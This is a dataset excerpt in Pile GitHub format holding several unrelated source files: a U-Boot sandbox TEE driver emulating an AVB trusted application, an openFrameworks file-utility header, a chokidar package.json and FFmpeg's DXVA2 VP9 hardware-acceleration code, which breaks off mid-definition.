text
stringlengths 2
100k
| meta
dict |
---|---|
TypeError: The global property undefined is not configurable, writable, nor enumerable, therefore cannot be declared as a function
at Global code (CanDeclareGlobalFunctionNonEval.js:1:1)
| {
"pile_set_name": "Github"
} |
// SPDX-License-Identifier: GPL-2.0+
/*
* Copyright (C) 2018 Linaro Limited
*/
#include <common.h>
#include <dm.h>
#include <sandboxtee.h>
#include <tee.h>
#include <tee/optee_ta_avb.h>
/*
* The sandbox tee driver tries to emulate a generic Trusted Exectution
* Environment (TEE) with the Trusted Application (TA) OPTEE_TA_AVB
* available.
*/
/**
 * struct ta_entry - TA entries
 * @uuid: UUID of an emulated TA
 * @open_session Called when a session is opened to the TA
 * @invoke_func Called when a function in the TA is to be invoked
 *
 * This struct is used to register TAs in this sandbox emulation of a TEE.
 * Both callbacks return a TEE_SUCCESS/TEE_ERROR_* result code.
 */
struct ta_entry {
	struct tee_optee_ta_uuid uuid;
	u32 (*open_session)(uint num_params, struct tee_param *params);
	u32 (*invoke_func)(u32 func, uint num_params, struct tee_param *params);
};
#ifdef CONFIG_OPTEE_TA_AVB
/*
 * get_attr() - attribute of parameter @n, or TYPE_NONE when out of range
 */
static u32 get_attr(uint n, uint num_params, struct tee_param *params)
{
	return n < num_params ? params[n].attr : TEE_PARAM_ATTR_TYPE_NONE;
}
/*
 * check_params() - verify that the supplied parameter attributes match
 * the expected pattern @p0..@p3 and that any extra parameters are unused
 * (TEE_PARAM_ATTR_TYPE_NONE).  Returns TEE_SUCCESS or
 * TEE_ERROR_BAD_PARAMETERS.
 */
static u32 check_params(u8 p0, u8 p1, u8 p2, u8 p3, uint num_params,
			struct tee_param *params)
{
	const u8 expect[] = { p0, p1, p2, p3 };
	uint i;

	for (i = 0; i < num_params || i < ARRAY_SIZE(expect); i++) {
		u8 want = i < ARRAY_SIZE(expect) ?
			expect[i] : TEE_PARAM_ATTR_TYPE_NONE;

		if (get_attr(i, num_params, params) != want) {
			printf("Bad param attrs\n");
			return TEE_ERROR_BAD_PARAMETERS;
		}
	}

	return TEE_SUCCESS;
}
/* Emulated persistent AVB state: rollback indexes and device lock state */
static u64 ta_avb_rollback_indexes[TA_AVB_MAX_ROLLBACK_LOCATIONS];
static u32 ta_avb_lock_state;
/*
 * ta_avb_open_session() - open a session to the emulated AVB TA
 *
 * Rejects the open if any parameter is supplied: all four attribute slots
 * (and any extras) must be TEE_PARAM_ATTR_TYPE_NONE.
 */
static u32 ta_avb_open_session(uint num_params, struct tee_param *params)
{
	/*
	 * We don't expect additional parameters when opening a session to
	 * this TA.
	 */
	return check_params(TEE_PARAM_ATTR_TYPE_NONE, TEE_PARAM_ATTR_TYPE_NONE,
			    TEE_PARAM_ATTR_TYPE_NONE, TEE_PARAM_ATTR_TYPE_NONE,
			    num_params, params);
}
/*
 * ta_avb_invoke_func() - dispatch a command invoked on the emulated AVB TA
 * @func:	TA_AVB_CMD_* command identifier
 * @num_params:	number of entries in @params
 * @params:	parameters passed by the client
 *
 * Implements read/write of rollback indexes and of the lock state, backed
 * by the static variables above.  Returns TEE_SUCCESS or a TEE_ERROR_*
 * code.
 */
static u32 ta_avb_invoke_func(u32 func, uint num_params,
			      struct tee_param *params)
{
	u32 res;
	uint slot;
	u64 val;

	switch (func) {
	case TA_AVB_CMD_READ_ROLLBACK_INDEX:
		/* params[0] in: slot index, params[1] out: 64-bit value */
		res = check_params(TEE_PARAM_ATTR_TYPE_VALUE_INPUT,
				   TEE_PARAM_ATTR_TYPE_VALUE_OUTPUT,
				   TEE_PARAM_ATTR_TYPE_NONE,
				   TEE_PARAM_ATTR_TYPE_NONE,
				   num_params, params);
		if (res)
			return res;

		slot = params[0].u.value.a;
		if (slot >= ARRAY_SIZE(ta_avb_rollback_indexes)) {
			printf("Rollback index slot out of bounds %u\n", slot);
			return TEE_ERROR_BAD_PARAMETERS;
		}

		/* Return the 64-bit index split into two 32-bit halves */
		val = ta_avb_rollback_indexes[slot];
		params[1].u.value.a = val >> 32;
		params[1].u.value.b = val;
		return TEE_SUCCESS;

	case TA_AVB_CMD_WRITE_ROLLBACK_INDEX:
		/* params[0] in: slot index, params[1] in: 64-bit value */
		res = check_params(TEE_PARAM_ATTR_TYPE_VALUE_INPUT,
				   TEE_PARAM_ATTR_TYPE_VALUE_INPUT,
				   TEE_PARAM_ATTR_TYPE_NONE,
				   TEE_PARAM_ATTR_TYPE_NONE,
				   num_params, params);
		if (res)
			return res;

		slot = params[0].u.value.a;
		if (slot >= ARRAY_SIZE(ta_avb_rollback_indexes)) {
			printf("Rollback index slot out of bounds %u\n", slot);
			return TEE_ERROR_BAD_PARAMETERS;
		}

		/* Rollback indexes may only increase, never decrease */
		val = (u64)params[1].u.value.a << 32 | params[1].u.value.b;
		if (val < ta_avb_rollback_indexes[slot])
			return TEE_ERROR_SECURITY;

		ta_avb_rollback_indexes[slot] = val;
		return TEE_SUCCESS;

	case TA_AVB_CMD_READ_LOCK_STATE:
		/* params[0] out: current lock state */
		res = check_params(TEE_PARAM_ATTR_TYPE_VALUE_OUTPUT,
				   TEE_PARAM_ATTR_TYPE_NONE,
				   TEE_PARAM_ATTR_TYPE_NONE,
				   TEE_PARAM_ATTR_TYPE_NONE,
				   num_params, params);
		if (res)
			return res;

		params[0].u.value.a = ta_avb_lock_state;
		return TEE_SUCCESS;

	case TA_AVB_CMD_WRITE_LOCK_STATE:
		/* params[0] in: new lock state */
		res = check_params(TEE_PARAM_ATTR_TYPE_VALUE_INPUT,
				   TEE_PARAM_ATTR_TYPE_NONE,
				   TEE_PARAM_ATTR_TYPE_NONE,
				   TEE_PARAM_ATTR_TYPE_NONE,
				   num_params, params);
		if (res)
			return res;

		/* Changing the lock state wipes all rollback indexes */
		if (ta_avb_lock_state != params[0].u.value.a) {
			ta_avb_lock_state = params[0].u.value.a;
			memset(ta_avb_rollback_indexes, 0,
			       sizeof(ta_avb_rollback_indexes));
		}

		return TEE_SUCCESS;
	default:
		return TEE_ERROR_NOT_SUPPORTED;
	}
}
#endif /*OPTEE_TA_AVB*/
/* Registry of emulated TAs; entries exist only when their config is enabled */
static const struct ta_entry ta_entries[] = {
#ifdef CONFIG_OPTEE_TA_AVB
	{ .uuid = TA_AVB_UUID,
	  .open_session = ta_avb_open_session,
	  .invoke_func = ta_avb_invoke_func,
	},
#endif
};
/*
 * sandbox_tee_get_version() - report capabilities of the emulated TEE
 *
 * All fields other than gen_caps are zero-filled.
 */
static void sandbox_tee_get_version(struct udevice *dev,
				    struct tee_version_data *vers)
{
	*vers = (struct tee_version_data){
		.gen_caps = TEE_GEN_CAP_GP | TEE_GEN_CAP_REG_MEM,
	};
}
/*
 * sandbox_tee_close_session() - close the (single) open session
 *
 * Returns -EINVAL unless @session matches the currently open session.
 */
static int sandbox_tee_close_session(struct udevice *dev, u32 session)
{
	struct sandbox_tee_state *state = dev_get_priv(dev);

	if (!state->ta || session != state->session)
		return -EINVAL;

	state->ta = NULL;
	state->session = 0;

	return 0;
}
/*
 * find_ta_entry() - look up a registered TA by its UUID octets
 *
 * Returns a pointer into ta_entries[], or NULL when no TA matches.
 */
static const struct ta_entry *find_ta_entry(u8 uuid[TEE_UUID_LEN])
{
	struct tee_optee_ta_uuid tmp;
	const struct ta_entry *entry;

	tee_optee_ta_uuid_from_octets(&tmp, uuid);

	for (entry = ta_entries;
	     entry != ta_entries + ARRAY_SIZE(ta_entries); entry++)
		if (!memcmp(&tmp, &entry->uuid, sizeof(tmp)))
			return entry;

	return NULL;
}
/*
 * sandbox_tee_open_session() - open a session to an emulated TA
 *
 * Only one session can be open at a time (-EBUSY otherwise).  A missing TA
 * is reported through arg->ret (TEE_ERROR_ITEM_NOT_FOUND) with a 0 return,
 * matching the TEE uclass convention of separating transport errors from
 * TEE-level results.
 */
static int sandbox_tee_open_session(struct udevice *dev,
				    struct tee_open_session_arg *arg,
				    uint num_params, struct tee_param *params)
{
	struct sandbox_tee_state *state = dev_get_priv(dev);
	const struct ta_entry *ta;

	if (state->ta) {
		printf("A session is already open\n");
		return -EBUSY;
	}

	ta = find_ta_entry(arg->uuid);
	if (!ta) {
		printf("Cannot find TA\n");
		arg->ret = TEE_ERROR_ITEM_NOT_FOUND;
		arg->ret_origin = TEE_ORIGIN_TEE;
		return 0;
	}

	arg->ret = ta->open_session(num_params, params);
	arg->ret_origin = TEE_ORIGIN_TRUSTED_APP;

	if (!arg->ret) {
		/* Single-session emulation: session id is always 1 */
		state->ta = (void *)ta;
		state->session = 1;
		arg->session = state->session;
	} else {
		printf("Cannot open session, TA returns error\n");
	}

	return 0;
}
/*
 * sandbox_tee_invoke_func() - invoke a function of the open TA session
 *
 * Validates the session id before delegating to the TA's invoke_func
 * callback.  TA-level results are returned via arg->ret; -EINVAL is used
 * only for invalid/missing sessions.
 */
static int sandbox_tee_invoke_func(struct udevice *dev,
				   struct tee_invoke_arg *arg,
				   uint num_params, struct tee_param *params)
{
	struct sandbox_tee_state *state = dev_get_priv(dev);
	struct ta_entry *ta = state->ta;

	if (!arg->session) {
		printf("Missing session\n");
		return -EINVAL;
	}

	if (!ta) {
		printf("TA session not available\n");
		return -EINVAL;
	}

	if (arg->session != state->session) {
		printf("Session mismatch\n");
		return -EINVAL;
	}

	arg->ret = ta->invoke_func(arg->func, num_params, params);
	arg->ret_origin = TEE_ORIGIN_TRUSTED_APP;

	return 0;
}
/*
 * sandbox_tee_shm_register() - count a shared-memory registration
 *
 * The sandbox only tracks the number of live registrations; the @shm
 * object itself is not inspected.
 */
static int sandbox_tee_shm_register(struct udevice *dev, struct tee_shm *shm)
{
	struct sandbox_tee_state *priv = dev_get_priv(dev);

	priv->num_shms++;

	return 0;
}
/*
 * sandbox_tee_shm_unregister() - drop one shared-memory registration
 */
static int sandbox_tee_shm_unregister(struct udevice *dev, struct tee_shm *shm)
{
	struct sandbox_tee_state *priv = dev_get_priv(dev);

	priv->num_shms--;

	return 0;
}
/* TEE uclass operations implemented by this emulation */
static const struct tee_driver_ops sandbox_tee_ops = {
	.get_version = sandbox_tee_get_version,
	.open_session = sandbox_tee_open_session,
	.close_session = sandbox_tee_close_session,
	.invoke_func = sandbox_tee_invoke_func,
	.shm_register = sandbox_tee_shm_register,
	.shm_unregister = sandbox_tee_shm_unregister,
};

/* Device tree match table */
static const struct udevice_id sandbox_tee_match[] = {
	{ .compatible = "sandbox,tee" },
	{},
};

U_BOOT_DRIVER(sandbox_tee) = {
	.name = "sandbox_tee",
	.id = UCLASS_TEE,
	.of_match = sandbox_tee_match,
	.ops = &sandbox_tee_ops,
	/* Per-device state is allocated by the driver model core */
	.priv_auto_alloc_size = sizeof(struct sandbox_tee_state),
};
| {
"pile_set_name": "Github"
} |
//
// FileUtils.h
// ParticleMaker
//
// Created by Andreas Müller on 04/03/2014.
//
//
#pragma once
// Static helpers for enumerating files in a folder and bulk-loading images.
//
// NOTE(review): relies on openFrameworks (ofDirectory, ofImage) and on
// `vector`/`string` being visible unqualified at the include site (e.g. via
// ofMain.h and `using namespace std`) — confirm include order in callers.
class FileUtils
{
public:

	// ---------------------------------------------------------------------------------------------------------------------------------------------------
	// Convenience overload: list files matching a single extension.
	static vector<string> getFilePathsInFolder( string _folder, string _extension )
	{
		vector<string> tmpExt;
		tmpExt.push_back( _extension );
		return getFilePathsInFolder( _folder, tmpExt );
	}

	// ---------------------------------------------------------------------------------------------------------------------------------------------------
	// List the paths of all files in _folder whose extension is in _extensions.
	static vector<string> getFilePathsInFolder( string _folder, vector<string> _extensions )
	{
		vector<string> filePaths;

		ofDirectory tmpDir( _folder );
		// Restrict the listing to the requested extensions
		for( unsigned int i = 0; i < _extensions.size(); i++ )
		{
			tmpDir.allowExt( _extensions.at(i) );
		}

		int numFiles = tmpDir.listDir( _folder );
		for( int i = 0; i < numFiles; i++ )
		{
			filePaths.push_back( tmpDir.getPath(i) );
		}

		return filePaths;
	}

	// ---------------------------------------------------------------------------------------------------------------------------------------------------
	// Return the first matching file path, or "" when none is found.
	static string getFirstFileOfTypeInFolder( string _folder, string _extension )
	{
		vector<string> tmpFiles = getFilePathsInFolder( _folder, _extension );
		if( tmpFiles.size() > 0 )
		{
			return tmpFiles.at(0);
		}
		return "";
	}

	// ---------------------------------------------------------------------------------------------------------------------------------------------------
	// List paths of common image files (png/bmp/jpg/tga) in _folder.
	static vector<string> getImageFilePathsInFolder( string _folder )
	{
		vector<string> tmpExt;
		tmpExt.push_back( "png" );
		tmpExt.push_back( "bmp" );
		tmpExt.push_back( "jpg" );
		tmpExt.push_back( "tga" );
		return getFilePathsInFolder( _folder, tmpExt );
	}

	// ---------------------------------------------------------------------------------------------------------------------------------------------------
	// Convenience overload: load all images with a single extension.
	static void loadImagesInFolder( string _folder, string _extension, vector<ofImage*>& _images )
	{
		vector<string> tmpExt;
		tmpExt.push_back( _extension );
		return loadImagesInFolder( _folder, tmpExt, _images );
	}

	// ---------------------------------------------------------------------------------------------------------------------------------------------------
	// Load every matching image in _folder, appending to _images.
	// The ofImage objects are heap-allocated here; the CALLER owns them and
	// is responsible for deleting each pointer.
	static void loadImagesInFolder( string _folder, vector<string> _extensions, vector<ofImage*>& _images )
	{
		vector<string> textureFilePaths = FileUtils::getFilePathsInFolder( _folder, _extensions );
		for( unsigned int i = 0; i < textureFilePaths.size(); i++ )
		{
			ofImage* tmpIm = new ofImage();
			// NOTE(review): load failure is not checked; a failed load still
			// appends the (empty) image — confirm this is intended.
			tmpIm->loadImage( textureFilePaths.at(i) );
			_images.push_back( tmpIm );
		}
	}
};
| {
"pile_set_name": "Github"
} |
{
"_from": "chokidar@^1.7.0",
"_id": "[email protected]",
"_inBundle": false,
"_integrity": "sha1-eY5ol3gVHIB2tLNg5e3SjNortGg=",
"_location": "/chokidar",
"_phantomChildren": {},
"_requested": {
"type": "range",
"registry": true,
"raw": "chokidar@^1.7.0",
"name": "chokidar",
"escapedName": "chokidar",
"rawSpec": "^1.7.0",
"saveSpec": null,
"fetchSpec": "^1.7.0"
},
"_requiredBy": [
"/watchpack"
],
"_resolved": "https://registry.npmjs.org/chokidar/-/chokidar-1.7.0.tgz",
"_shasum": "798e689778151c8076b4b360e5edd28cda2bb468",
"_spec": "chokidar@^1.7.0",
"_where": "/Users/disk0nn3ct/Documents/empire-gui/node_modules/watchpack",
"author": {
"name": "Paul Miller",
"url": "http://paulmillr.com"
},
"bugs": {
"url": "http://github.com/paulmillr/chokidar/issues"
},
"bundleDependencies": false,
"dependencies": {
"anymatch": "^1.3.0",
"async-each": "^1.0.0",
"fsevents": "^1.0.0",
"glob-parent": "^2.0.0",
"inherits": "^2.0.1",
"is-binary-path": "^1.0.0",
"is-glob": "^2.0.0",
"path-is-absolute": "^1.0.0",
"readdirp": "^2.0.0"
},
"deprecated": false,
"description": "A neat wrapper around node.js fs.watch / fs.watchFile / fsevents.",
"devDependencies": {
"chai": "^3.2.0",
"coveralls": "^2.11.2",
"graceful-fs": "4.1.4",
"istanbul": "^0.3.20",
"mocha": "^3.0.0",
"rimraf": "^2.4.3",
"sinon": "^1.10.3",
"sinon-chai": "^2.6.0"
},
"files": [
"index.js",
"lib/"
],
"homepage": "https://github.com/paulmillr/chokidar",
"keywords": [
"fs",
"watch",
"watchFile",
"watcher",
"watching",
"file",
"fsevents"
],
"license": "MIT",
"name": "chokidar",
"optionalDependencies": {
"fsevents": "^1.0.0"
},
"repository": {
"type": "git",
"url": "git+https://github.com/paulmillr/chokidar.git"
},
"scripts": {
"ci-test": "istanbul cover _mocha && cat ./coverage/lcov.info | coveralls",
"test": "istanbul test node_modules/mocha/bin/_mocha"
},
"version": "1.7.0"
}
| {
"pile_set_name": "Github"
} |
/*
* DXVA2 VP9 HW acceleration.
*
* copyright (c) 2015 Hendrik Leppkes
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/avassert.h"
#include "libavutil/pixdesc.h"
#include "dxva2_internal.h"
#include "vp9shared.h"
/* Per-picture state accumulated between start_frame and end_frame */
struct vp9_dxva2_picture_context {
    DXVA_PicParams_VP9  pp;           /* picture parameters for the accelerator */
    DXVA_Slice_VPx_Short slice;       /* short slice descriptor for the bitstream */
    const uint8_t       *bitstream;   /* start of slice data (not owned) */
    unsigned            bitstream_size; /* total bytes submitted via decode_slice */
};
/*
 * Pack a 7-bit surface index and a 1-bit flag into a DXVA picture entry.
 */
static void fill_picture_entry(DXVA_PicEntry_VPx *pic,
                               unsigned index, unsigned flag)
{
    /* Index must fit in 7 bits, flag in 1 bit */
    av_assert0(index <= 0x7f && flag <= 1);

    pic->bPicEntry = (flag << 7) | index;
}
/*
 * Translate the parsed VP9 uncompressed header into DXVA_PicParams_VP9.
 * Returns 0 on success, -1 when the software pixel format is unknown.
 */
static int fill_picture_parameters(const AVCodecContext *avctx, AVDXVAContext *ctx, const VP9SharedContext *h,
                                   DXVA_PicParams_VP9 *pp)
{
    int i;
    const AVPixFmtDescriptor * pixdesc = av_pix_fmt_desc_get(avctx->sw_pix_fmt);

    if (!pixdesc)
        return -1;

    memset(pp, 0, sizeof(*pp));

    /* Surface index of the picture currently being decoded */
    fill_picture_entry(&pp->CurrPic, ff_dxva2_get_surface_index(avctx, ctx, h->frames[CUR_FRAME].tf.f), 0);

    pp->profile = h->h.profile;
    /*
     * Pack the format/picture bitfield.  keyframe and invisible are
     * inverted relative to the parser's flags; chroma subsampling comes
     * from the pixel format descriptor.
     */
    pp->wFormatAndPictureInfoFlags = ((h->h.keyframe == 0)   <<  0) |
                                     ((h->h.invisible == 0)  <<  1) |
                                     (h->h.errorres          <<  2) |
                                     (pixdesc->log2_chroma_w <<  3) | /* subsampling_x */
                                     (pixdesc->log2_chroma_h <<  4) | /* subsampling_y */
                                     (0                      <<  5) | /* extra_plane */
                                     (h->h.refreshctx        <<  6) |
                                     (h->h.parallelmode      <<  7) |
                                     (h->h.intraonly         <<  8) |
                                     (h->h.framectxid        <<  9) |
                                     (h->h.resetctx          << 11) |
                                     ((h->h.keyframe ? 0 : h->h.highprecisionmvs) << 13) |
                                     (0                      << 14);  /* ReservedFormatInfo2Bits */

    pp->width  = avctx->width;
    pp->height = avctx->height;
    pp->BitDepthMinus8Luma   = pixdesc->comp[0].depth - 8;
    pp->BitDepthMinus8Chroma = pixdesc->comp[1].depth - 8;
    /* swap 0/1 to match the reference */
    pp->interp_filter = h->h.filtermode ^ (h->h.filtermode <= 1);
    pp->Reserved8Bits = 0;

    /* Full 8-entry reference frame map; unused slots are marked 0xFF */
    for (i = 0; i < 8; i++) {
        if (h->refs[i].f->buf[0]) {
            fill_picture_entry(&pp->ref_frame_map[i], ff_dxva2_get_surface_index(avctx, ctx, h->refs[i].f), 0);
            pp->ref_frame_coded_width[i]  = h->refs[i].f->width;
            pp->ref_frame_coded_height[i] = h->refs[i].f->height;
        } else
            pp->ref_frame_map[i].bPicEntry = 0xFF;
    }

    /* The three active references (last/golden/altref) and their sign bias */
    for (i = 0; i < 3; i++) {
        uint8_t refidx = h->h.refidx[i];
        if (h->refs[refidx].f->buf[0])
            fill_picture_entry(&pp->frame_refs[i], ff_dxva2_get_surface_index(avctx, ctx, h->refs[refidx].f), 0);
        else
            pp->frame_refs[i].bPicEntry = 0xFF;

        pp->ref_frame_sign_bias[i + 1] = h->h.signbias[i];
    }

    /* Loop filter parameters */
    pp->filter_level    = h->h.filter.level;
    pp->sharpness_level = h->h.filter.sharpness;

    pp->wControlInfoFlags = (h->h.lf_delta.enabled   << 0) |
                            (h->h.lf_delta.updated   << 1) |
                            (h->h.use_last_frame_mvs << 2) |
                            (0                       << 3);  /* ReservedControlInfo5Bits */

    for (i = 0; i < 4; i++)
        pp->ref_deltas[i]  = h->h.lf_delta.ref[i];

    for (i = 0; i < 2; i++)
        pp->mode_deltas[i]  = h->h.lf_delta.mode[i];

    /* Quantization parameters */
    pp->base_qindex   = h->h.yac_qi;
    pp->y_dc_delta_q  = h->h.ydc_qdelta;
    pp->uv_dc_delta_q = h->h.uvdc_qdelta;
    pp->uv_ac_delta_q = h->h.uvac_qdelta;

    /* segmentation data */
    pp->stVP9Segments.wSegmentInfoFlags = (h->h.segmentation.enabled       << 0) |
                                          (h->h.segmentation.update_map    << 1) |
                                          (h->h.segmentation.temporal      << 2) |
                                          (h->h.segmentation.absolute_vals << 3) |
                                          (0                               << 4);  /* ReservedSegmentFlags4Bits */

    for (i = 0; i < 7; i++)
        pp->stVP9Segments.tree_probs[i] = h->h.segmentation.prob[i];

    /* Without temporal prediction the pred probs are all 255 */
    if (h->h.segmentation.temporal)
        for (i = 0; i < 3; i++)
            pp->stVP9Segments.pred_probs[i] = h->h.segmentation.pred_prob[i];
    else
        memset(pp->stVP9Segments.pred_probs, 255, sizeof(pp->stVP9Segments.pred_probs));

    /* Per-segment feature enable mask and values (no value for "skip") */
    for (i = 0; i < 8; i++) {
        pp->stVP9Segments.feature_mask[i] = (h->h.segmentation.feat[i].q_enabled    << 0) |
                                            (h->h.segmentation.feat[i].lf_enabled   << 1) |
                                            (h->h.segmentation.feat[i].ref_enabled  << 2) |
                                            (h->h.segmentation.feat[i].skip_enabled << 3);

        pp->stVP9Segments.feature_data[i][0] = h->h.segmentation.feat[i].q_val;
        pp->stVP9Segments.feature_data[i][1] = h->h.segmentation.feat[i].lf_val;
        pp->stVP9Segments.feature_data[i][2] = h->h.segmentation.feat[i].ref_val;
        pp->stVP9Segments.feature_data[i][3] = 0; /* no data for skip */
    }

    /* Tiling and header sizes */
    pp->log2_tile_cols = h->h.tiling.log2_tile_cols;
    pp->log2_tile_rows = h->h.tiling.log2_tile_rows;

    pp->uncompressed_header_size_byte_aligned = h->h.uncompressed_header_size;
    pp->first_partition_size = h->h.compressed_header_size;

    /* Monotonically increasing id for driver status reports */
    pp->StatusReportFeedbackNumber = 1 + DXVA_CONTEXT_REPORT_ID(avctx, ctx)++;
    return 0;
}
/*
 * Initialize a short slice descriptor for a whole, unchopped slice.
 * The struct is zeroed first so all reserved/padding bytes are 0.
 */
static void fill_slice_short(DXVA_Slice_VPx_Short *slice,
                             unsigned position, unsigned size)
{
    memset(slice, 0, sizeof(*slice));

    slice->wBadSliceChopping     = 0; /* whole slice is present */
    slice->SliceBytesInBuffer    = size;
    slice->BSNALunitDataLocation = position;
}
/*
 * Copy the frame's bitstream into the accelerator's bitstream buffer and
 * fill the bitstream/slice-control buffer descriptors.  Handles both the
 * D3D11VA and the DXVA2 API variants, selected at runtime.
 * Returns 0 on success, -1 on any API/overflow failure.
 */
static int commit_bitstream_and_slice_buffer(AVCodecContext *avctx,
                                             DECODER_BUFFER_DESC *bs,
                                             DECODER_BUFFER_DESC *sc)
{
    const VP9SharedContext *h = avctx->priv_data;
    AVDXVAContext *ctx = DXVA_CONTEXT(avctx);
    struct vp9_dxva2_picture_context *ctx_pic = h->frames[CUR_FRAME].hwaccel_picture_private;
    void     *dxva_data_ptr;
    uint8_t  *dxva_data;
    unsigned dxva_size;
    unsigned padding;
    unsigned type;

    /* Map the accelerator's bitstream buffer */
#if CONFIG_D3D11VA
    if (ff_dxva2_is_d3d11(avctx)) {
        type = D3D11_VIDEO_DECODER_BUFFER_BITSTREAM;
        if (FAILED(ID3D11VideoContext_GetDecoderBuffer(D3D11VA_CONTEXT(ctx)->video_context,
                                                       D3D11VA_CONTEXT(ctx)->decoder,
                                                       type,
                                                       &dxva_size, &dxva_data_ptr)))
            return -1;
    }
#endif
#if CONFIG_DXVA2
    if (avctx->pix_fmt == AV_PIX_FMT_DXVA2_VLD) {
        type = DXVA2_BitStreamDateBufferType;
        if (FAILED(IDirectXVideoDecoder_GetBuffer(DXVA2_CONTEXT(ctx)->decoder,
                                                  type,
                                                  &dxva_data_ptr, &dxva_size)))
            return -1;
    }
#endif

    dxva_data = dxva_data_ptr;

    if (ctx_pic->slice.SliceBytesInBuffer > dxva_size) {
        av_log(avctx, AV_LOG_ERROR, "Failed to build bitstream");
        return -1;
    }

    memcpy(dxva_data, ctx_pic->bitstream, ctx_pic->slice.SliceBytesInBuffer);

    /* Pad the payload with zeros up to the next 128-byte boundary,
     * clamped to the remaining buffer space */
    padding = FFMIN(128 - ((ctx_pic->slice.SliceBytesInBuffer) & 127), dxva_size - ctx_pic->slice.SliceBytesInBuffer);
    if (padding > 0) {
        memset(dxva_data + ctx_pic->slice.SliceBytesInBuffer, 0, padding);
        ctx_pic->slice.SliceBytesInBuffer += padding;
    }

    /* Unmap the bitstream buffer */
#if CONFIG_D3D11VA
    if (ff_dxva2_is_d3d11(avctx))
        if (FAILED(ID3D11VideoContext_ReleaseDecoderBuffer(D3D11VA_CONTEXT(ctx)->video_context, D3D11VA_CONTEXT(ctx)->decoder, type)))
            return -1;
#endif
#if CONFIG_DXVA2
    if (avctx->pix_fmt == AV_PIX_FMT_DXVA2_VLD)
        if (FAILED(IDirectXVideoDecoder_ReleaseBuffer(DXVA2_CONTEXT(ctx)->decoder, type)))
            return -1;
#endif

    /* Describe the bitstream buffer, then switch @type to the
     * slice-control buffer for the commit below */
#if CONFIG_D3D11VA
    if (ff_dxva2_is_d3d11(avctx)) {
        D3D11_VIDEO_DECODER_BUFFER_DESC *dsc11 = bs;
        memset(dsc11, 0, sizeof(*dsc11));
        dsc11->BufferType           = type;
        dsc11->DataSize             = ctx_pic->slice.SliceBytesInBuffer;
        dsc11->NumMBsInBuffer       = 0;

        type = D3D11_VIDEO_DECODER_BUFFER_SLICE_CONTROL;
    }
#endif
#if CONFIG_DXVA2
    if (avctx->pix_fmt == AV_PIX_FMT_DXVA2_VLD) {
        DXVA2_DecodeBufferDesc *dsc2 = bs;
        memset(dsc2, 0, sizeof(*dsc2));
        dsc2->CompressedBufferType = type;
        dsc2->DataSize             = ctx_pic->slice.SliceBytesInBuffer;
        dsc2->NumMBsInBuffer       = 0;

        type = DXVA2_SliceControlBufferType;
    }
#endif

    return ff_dxva2_commit_buffer(avctx, ctx, sc,
                                  type,
                                  &ctx_pic->slice, sizeof(ctx_pic->slice), 0);
}
/*
 * Begin decoding a frame: build the picture parameters and reset the
 * per-frame bitstream accumulation state.  Returns 0 or -1.
 */
static int dxva2_vp9_start_frame(AVCodecContext *avctx,
                                 av_unused const uint8_t *buffer,
                                 av_unused uint32_t size)
{
    const VP9SharedContext *h = avctx->priv_data;
    AVDXVAContext *ctx = DXVA_CONTEXT(avctx);
    struct vp9_dxva2_picture_context *ctx_pic = h->frames[CUR_FRAME].hwaccel_picture_private;

    if (!DXVA_CONTEXT_VALID(avctx, ctx))
        return -1;
    av_assert0(ctx_pic);

    /* Fill up DXVA_PicParams_VP9 */
    if (fill_picture_parameters(avctx, ctx, h, &ctx_pic->pp) < 0)
        return -1;

    ctx_pic->bitstream_size = 0;
    ctx_pic->bitstream      = NULL;
    return 0;
}
/*
 * Accumulate slice data for the current frame.  The first call latches
 * the start of the bitstream; each call rewrites the short slice
 * descriptor for the slice just received.
 * NOTE(review): the descriptor covers only the latest slice's @size —
 * presumably the VP9 decoder submits a single slice per frame; confirm.
 */
static int dxva2_vp9_decode_slice(AVCodecContext *avctx,
                                  const uint8_t *buffer,
                                  uint32_t size)
{
    const VP9SharedContext *h = avctx->priv_data;
    struct vp9_dxva2_picture_context *ctx_pic = h->frames[CUR_FRAME].hwaccel_picture_private;
    unsigned position;

    if (!ctx_pic->bitstream)
        ctx_pic->bitstream = buffer;
    ctx_pic->bitstream_size += size;

    position = buffer - ctx_pic->bitstream;
    fill_slice_short(&ctx_pic->slice, position, size);

    return 0;
}
/*
 * Finish the frame: hand the accumulated picture parameters and
 * bitstream over to the common DXVA2 commit path.
 * Returns -1 when no slice data was received.
 */
static int dxva2_vp9_end_frame(AVCodecContext *avctx)
{
    VP9SharedContext *h = avctx->priv_data;
    struct vp9_dxva2_picture_context *ctx_pic = h->frames[CUR_FRAME].hwaccel_picture_private;

    if (ctx_pic->bitstream_size <= 0)
        return -1;

    return ff_dxva2_common_end_frame(avctx, h->frames[CUR_FRAME].tf.f,
                                     &ctx_pic->pp, sizeof(ctx_pic->pp),
                                     NULL, 0,
                                     commit_bitstream_and_slice_buffer);
}
/* Hardware accelerator registrations: one entry per supported API/pixfmt,
 * all sharing the same start/decode/end callbacks above. */
#if CONFIG_VP9_DXVA2_HWACCEL
const AVHWAccel ff_vp9_dxva2_hwaccel = {
    .name           = "vp9_dxva2",
    .type           = AVMEDIA_TYPE_VIDEO,
    .id             = AV_CODEC_ID_VP9,
    .pix_fmt        = AV_PIX_FMT_DXVA2_VLD,
    .init           = ff_dxva2_decode_init,
    .uninit         = ff_dxva2_decode_uninit,
    .start_frame    = dxva2_vp9_start_frame,
    .decode_slice   = dxva2_vp9_decode_slice,
    .end_frame      = dxva2_vp9_end_frame,
    .frame_params   = ff_dxva2_common_frame_params,
    .frame_priv_data_size = sizeof(struct vp9_dxva2_picture_context),
    .priv_data_size = sizeof(FFDXVASharedContext),
};
#endif

#if CONFIG_VP9_D3D11VA_HWACCEL
const AVHWAccel ff_vp9_d3d11va_hwaccel = {
    .name           = "vp9_d3d11va",
    .type           = AVMEDIA_TYPE_VIDEO,
    .id             = AV_CODEC_ID_VP9,
    .pix_fmt        = AV_PIX_FMT_D3D11VA_VLD,
    .init           = ff_dxva2_decode_init,
    .uninit         = ff_dxva2_decode_uninit,
